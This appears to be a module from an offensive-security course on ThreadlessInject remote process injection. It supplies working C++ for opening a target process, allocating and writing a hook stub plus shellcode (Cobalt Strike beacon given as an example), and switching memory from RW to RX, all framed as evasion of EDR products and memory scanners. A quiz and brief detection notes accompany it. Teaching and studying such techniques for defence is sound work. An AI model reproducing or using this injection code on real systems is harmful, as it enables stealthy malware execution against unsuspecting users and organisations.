Difficulty: Intermediate

Module 4: Memory Allocation in Remote Process

Before you can hook anything, you need memory in the target process for your shellcode and stub.

What Gets Written Where

ThreadlessInject needs to place three things into the target process: (1) the shellcode payload, (2) the hook stub that saves/restores registers and calls the shellcode, and (3) the saved original bytes from the hooked function along with a jump back. All of these are written into a single allocated memory region in the target process using cross-process memory APIs.

Cross-Process Memory Allocation

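To allocate memory in another process, you call NtAllocateVirtualMemory with the target process handle. This is the native API that VirtualAllocEx ultimately calls, and it is exported by ntdll.dll. Calling it directly skips any userland hooks that EDR products have placed on kernel32.dll or kernelbase.dll, but not hooks placed on the ntdll.dll export itself, and the request still ends in the same system call that kernel-level telemetry can observe.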

C++
// NtAllocateVirtualMemory - allocate memory in the remote process
// This is what ThreadlessInject uses instead of VirtualAllocEx

typedef NTSTATUS (NTAPI *pNtAllocateVirtualMemory)(
    HANDLE    ProcessHandle,   // Target process handle
    PVOID    *BaseAddress,     // In/out: desired/actual base address
    ULONG_PTR ZeroBits,        // Number of high-order zero bits in address
    PSIZE_T   RegionSize,      // In/out: desired/actual size
    ULONG     AllocationType,  // MEM_COMMIT | MEM_RESERVE
    ULONG     Protect          // PAGE_READWRITE initially
);

// Usage in ThreadlessInject:
// IMPORTANT: The actual tool allocates within +/- 2GB of the target export
// to enable a 5-byte relative CALL (E8). It scans addresses near the target.
PVOID remoteBase = NULL;
SIZE_T regionSize = shellcodeLen + stubLen + originalBytesLen + 256; // padding

NTSTATUS status = NtAllocateVirtualMemory(
    hProcess,                       // Target process handle
    &remoteBase,                    // In: NULL here, so the system picks the base; out: actual base
    0,                              // No zero-bit constraints
    &regionSize,                    // Total size needed
    MEM_COMMIT | MEM_RESERVE,       // Commit immediately
    PAGE_READWRITE                  // Start as RW (not executable yet)
);

The 2GB Allocation Constraint

Because ThreadlessInject redirects execution with a 5-byte relative CALL instruction (opcode E8 followed by a signed 32-bit displacement), the allocated region must lie within roughly +/- 2GB of the target function. The actual tool scans memory regions near the target export address, attempting allocation at each candidate until one succeeds. This is a key operational constraint: if no suitable memory hole exists within range, the injection fails.
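The range limit follows directly from how a rel32 displacement is computed: it is measured from the end of the 5-byte CALL to the destination and must fit in a signed 32-bit integer. The sketch below shows only that arithmetic. The helper names (callDisplacement, fitsRel32, encodeRel32) are hypothetical and are not taken from the ThreadlessInject source; the unsigned-to-signed cast assumes a two's complement target, which C++20 guarantees.

```cpp
#include <cassert>
#include <cstdint>
#include <limits>

// An E8 CALL is 1 opcode byte followed by a 4-byte signed displacement.
constexpr std::uint64_t kCallLen = 5;

// Signed distance from the end of the CALL instruction to the destination.
// The unsigned subtraction wraps modulo 2^64; the cast reinterprets the
// result as a signed value (two's complement assumed).
inline std::int64_t callDisplacement(std::uint64_t callSite, std::uint64_t target) {
    return static_cast<std::int64_t>(target - (callSite + kCallLen));
}

// True when the displacement is representable as a signed 32-bit integer.
inline bool fitsRel32(std::uint64_t callSite, std::uint64_t target) {
    const std::int64_t d = callDisplacement(callSite, target);
    return d >= std::numeric_limits<std::int32_t>::min() &&
           d <= std::numeric_limits<std::int32_t>::max();
}

// Returns the 4-byte operand value; the caller must have checked the range.
inline std::int32_t encodeRel32(std::uint64_t callSite, std::uint64_t target) {
    assert(fitsRel32(callSite, target) && "target is out of rel32 range");
    return static_cast<std::int32_t>(callDisplacement(callSite, target));
}
```

Note that the window is not perfectly symmetric: it spans from 2^31 bytes below to 2^31 - 1 bytes above the address immediately following the CALL.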

Initial Protection: RW, Not RWX

Notice that the allocation uses PAGE_READWRITE, not PAGE_EXECUTE_READWRITE. Allocating RWX memory directly is a significant red flag that memory scanners detect. ThreadlessInject allocates as RW, writes all the data, and then changes the protection to RX (read-execute) before installing the hook. This avoids the RWX signature entirely and is a common evasion technique.

Memory Layout in the Remote Process

ThreadlessInject organizes the allocated memory region with a specific layout. The hook stub comes first, followed by the shellcode payload, followed by the saved original bytes and the jump-back instruction:

Remote Memory Region Layout

Hook Stub (~50 bytes): save registers → call shellcode → restore registers
Shellcode Payload (variable size): the actual payload (e.g., Cobalt Strike beacon shellcode)
Original Bytes (14 bytes saved from hooked function): the overwritten prologue instructions
Jump-Back (14 bytes): JMP [RIP+0] + address of HookedFunc+14

This layout is contiguous in memory, which means a single allocation and a single write operation can place everything. The hook stub knows the relative offset to the shellcode (it is immediately after the stub), and the original bytes block knows it must jump to hookedFunction + 14 to resume normal execution.
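Because the blocks are contiguous, every offset is a running sum of the sizes before it. The following sketch computes those offsets for the layout described above. RegionLayout and computeLayout are hypothetical names used for illustration, and the two 14-byte constants simply restate the sizes given in this module.

```cpp
#include <cassert>
#include <cstddef>

constexpr std::size_t kSavedBytesLen = 14;  // saved prologue bytes
constexpr std::size_t kJumpBackLen   = 14;  // JMP [RIP+0] plus 8-byte address

// Byte offsets of each block, measured from the start of the region.
struct RegionLayout {
    std::size_t stubOffset;
    std::size_t shellcodeOffset;
    std::size_t savedBytesOffset;
    std::size_t jumpBackOffset;
    std::size_t totalSize;
};

// Each offset is the sum of the sizes of all blocks that precede it.
constexpr RegionLayout computeLayout(std::size_t stubLen, std::size_t payloadLen) {
    return RegionLayout{
        0,
        stubLen,
        stubLen + payloadLen,
        stubLen + payloadLen + kSavedBytesLen,
        stubLen + payloadLen + kSavedBytesLen + kJumpBackLen};
}

// Usage: a 50-byte stub and a 1000-byte payload.
inline void layoutExample() {
    constexpr RegionLayout l = computeLayout(50, 1000);
    assert(l.savedBytesOffset == 1050);
    assert(l.totalSize == 1078);
}
```

Keeping the offsets in one place avoids repeating expressions such as hookStubLen + shellcodeLen + 14 at every copy site, where an off-by-one is easy to introduce.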

Writing Data to the Remote Process

After allocation, you write the complete payload into the remote memory region using NtWriteVirtualMemory:

C++
// Step 1: Build the complete payload locally
// Combine hook stub + shellcode + original bytes + jump-back into one buffer
BYTE* localBuffer = (BYTE*)malloc(regionSize);

// Copy hook stub at offset 0
memcpy(localBuffer, hookStub, hookStubLen);

// Copy shellcode immediately after
memcpy(localBuffer + hookStubLen, shellcode, shellcodeLen);

// Copy saved original bytes after shellcode
memcpy(localBuffer + hookStubLen + shellcodeLen, originalBytes, 14);

// Build jump-back to hookedFunc + 14
BYTE jumpBack[14];
jumpBack[0] = 0xFF; jumpBack[1] = 0x25;                    // JMP [RIP+0]
*(DWORD*)(jumpBack + 2) = 0;                                // RIP-relative offset = 0
*(UINT64*)(jumpBack + 6) = (UINT64)hookedFuncAddr + 14;     // Target: original func + 14
memcpy(localBuffer + hookStubLen + shellcodeLen + 14, jumpBack, 14);

// Step 2: Write the complete buffer to the remote process
SIZE_T bytesWritten = 0;
NtWriteVirtualMemory(
    hProcess,           // Target process
    remoteBase,         // Destination (allocated earlier)
    localBuffer,        // Source (our local buffer)
    regionSize,         // Total size
    &bytesWritten       // Bytes actually written
);

Memory Protection Management

After writing, the memory must be changed from PAGE_READWRITE to PAGE_EXECUTE_READ. This is done with NtProtectVirtualMemory:

C++
// Change protection: RW -> RX (read + execute, no write)
ULONG oldProtect = 0;
PVOID protectBase = remoteBase;
SIZE_T protectSize = regionSize;

NtProtectVirtualMemory(
    hProcess,           // Target process
    &protectBase,       // Address to change
    &protectSize,       // Size of region
    PAGE_EXECUTE_READ,  // New protection: RX
    &oldProtect         // Previous protection stored here
);
// Now the region is executable but not writable
// The shellcode and hook stub can execute but cannot be easily modified

This two-step approach (allocate RW, write, change to RX) is a standard evasion pattern. It means at no point does the memory have simultaneous write and execute permissions, avoiding the RWX detection heuristic used by tools like Moneta.

Process Handle Requirements

All these cross-process operations require a handle to the target process with specific access rights. Here is the minimum set of rights needed:

Access Right | Constant | Purpose
VM Operation | PROCESS_VM_OPERATION | Required for NtAllocateVirtualMemory and NtProtectVirtualMemory
VM Write | PROCESS_VM_WRITE | Required for NtWriteVirtualMemory
VM Read | PROCESS_VM_READ | Required for NtReadVirtualMemory (reading original bytes)

C++
// Opening the target process with minimum required rights
// ThreadlessInject uses NtOpenProcess (not kernel32 OpenProcess) for stealth
OBJECT_ATTRIBUTES oa = {sizeof(OBJECT_ATTRIBUTES)};
CLIENT_ID cid = {(HANDLE)(ULONG_PTR)targetPid, NULL};
HANDLE hProcess = NULL;

NtOpenProcess(
    &hProcess,
    PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
    &oa,
    &cid
);
// Note: PROCESS_ALL_ACCESS works but is more suspicious
// Using minimum rights reduces the detection surface

Detection Consideration: Handle Access Rights

EDR products monitor process handle creation through kernel object callbacks registered with ObRegisterCallbacks, and they flag processes that request suspicious combinations of access rights. Because the callback runs in the kernel, it fires whether the handle is requested through OpenProcess or NtOpenProcess. Requesting PROCESS_ALL_ACCESS on another process is an obvious red flag. Requesting specifically PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ is uncommon in legitimate software and still suspicious, but slightly less conspicuous than full access. Some operators combine ThreadlessInject with handle duplication or handle inheritance techniques to avoid the OpenProcess call entirely, although handle duplication is itself reported to the same callbacks.
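From the defender's side, the check described above reduces to a bitmask test on the requested access. The sketch below is a minimal illustration of that test and not how any particular EDR implements it. The numeric values are the documented Windows SDK constants, redefined locally so the snippet compiles without windows.h; the function name requestsRemoteWriteSet is hypothetical.

```cpp
#include <cassert>
#include <cstdint>

// Values match the Windows SDK definitions of the same-named rights.
constexpr std::uint32_t kProcessVmOperation = 0x0008;  // PROCESS_VM_OPERATION
constexpr std::uint32_t kProcessVmRead      = 0x0010;  // PROCESS_VM_READ
constexpr std::uint32_t kProcessVmWrite     = 0x0020;  // PROCESS_VM_WRITE
constexpr std::uint32_t kProcessAllAccess   = 0x1FFFFF; // PROCESS_ALL_ACCESS (Vista and later)

// The combination that allows remote allocate, protect, read, and write.
constexpr std::uint32_t kRemoteWriteSet =
    kProcessVmOperation | kProcessVmRead | kProcessVmWrite;

// True when a requested access mask contains every right in the set.
// PROCESS_ALL_ACCESS matches too, because it is a superset.
constexpr bool requestsRemoteWriteSet(std::uint32_t desiredAccess) {
    return (desiredAccess & kRemoteWriteSet) == kRemoteWriteSet;
}

// Usage: a read-only handle request does not match, the full set does.
inline void accessMaskExample() {
    assert(!requestsRemoteWriteSet(kProcessVmRead));
    assert(requestsRemoteWriteSet(kRemoteWriteSet));
}
```

A real detection would weigh this signal together with the identity of the requesting and target processes, since debuggers and some system tools legitimately request the same rights.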

Reading the Original Function Bytes

Before overwriting the target function's prologue with the hook instruction, you must save the original bytes. These are needed both for the trampoline (to execute them after the hook) and for the cleanup phase (to restore them after the shellcode runs once):

C++
// Read the first 14 bytes of the target function in the remote process
BYTE originalBytes[14] = {0};
SIZE_T bytesRead = 0;

NtReadVirtualMemory(
    hProcess,                    // Target process
    (PVOID)hookedFuncAddr,       // Address of target function
    originalBytes,               // Buffer to store original bytes
    14,                          // Read 14 bytes
    &bytesRead                   // Actual bytes read
);

// These 14 bytes will be:
// 1. Embedded in the trampoline (to execute after hook code)
// 2. Stored by the hook stub for restoration after first execution

Summary: The Memory Setup Sequence

The complete memory setup for ThreadlessInject follows this order: (1) Open the target process handle with VM rights. (2) Read the original 14 bytes from the target function. (3) Allocate a RW memory region in the target process. (4) Build the local buffer containing hook stub + shellcode + original bytes + jump-back. (5) Write the buffer to the remote allocation. (6) Change the protection from RW to RX. The allocated region is now ready, and the next step (Module 6) is to install the actual hook by overwriting the target function's prologue.

Pop Quiz: Remote Memory Allocation

Q1: Why does ThreadlessInject allocate memory as PAGE_READWRITE and then change it to PAGE_EXECUTE_READ?

Memory scanners like Moneta flag PAGE_EXECUTE_READWRITE (RWX) regions because legitimate programs rarely need them. By allocating as RW (writable but not executable), writing the payload, and then switching to RX (executable but not writable), ThreadlessInject ensures the memory is never simultaneously writable and executable.

Q2: What process access rights are required for NtAllocateVirtualMemory on a remote process?

NtAllocateVirtualMemory and NtProtectVirtualMemory require PROCESS_VM_OPERATION. NtWriteVirtualMemory additionally requires PROCESS_VM_WRITE, and NtReadVirtualMemory requires PROCESS_VM_READ. Notably, PROCESS_CREATE_THREAD is NOT needed since ThreadlessInject never creates a thread.

Q3: In the remote memory layout, what comes immediately after the shellcode payload?

The 14 saved original bytes from the hooked function's prologue come immediately after the shellcode. The full layout is: hook stub, then shellcode, then the saved original bytes, then a 14-byte JMP instruction that jumps back to the hooked function at offset +14 (continuing where the overwritten bytes left off).